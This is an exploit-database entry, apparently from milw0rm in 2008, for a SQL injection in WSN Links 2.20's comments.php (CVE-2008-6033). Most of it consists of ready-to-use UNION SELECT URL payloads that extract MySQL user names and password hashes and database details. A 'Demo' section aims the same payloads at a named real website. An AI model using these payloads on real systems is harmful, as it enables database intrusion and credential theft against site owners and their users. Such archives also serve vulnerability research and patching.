WSN Links 2.20 - 'comments.php' SQL Injection

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2008-09-21 
date_updated:  
verified: 1 
codes: OSVDB-51801;CVE-2008-6033 
tags: 
aliases:  
screenshot_url:  
application_url: 

[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
[~]
[~] http://scripts.webmastersite.net/wsnlinks/
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 21.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
[~]
[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~]
[~] Demo :-
[~]
[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
[~]
[~]----------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-09-22]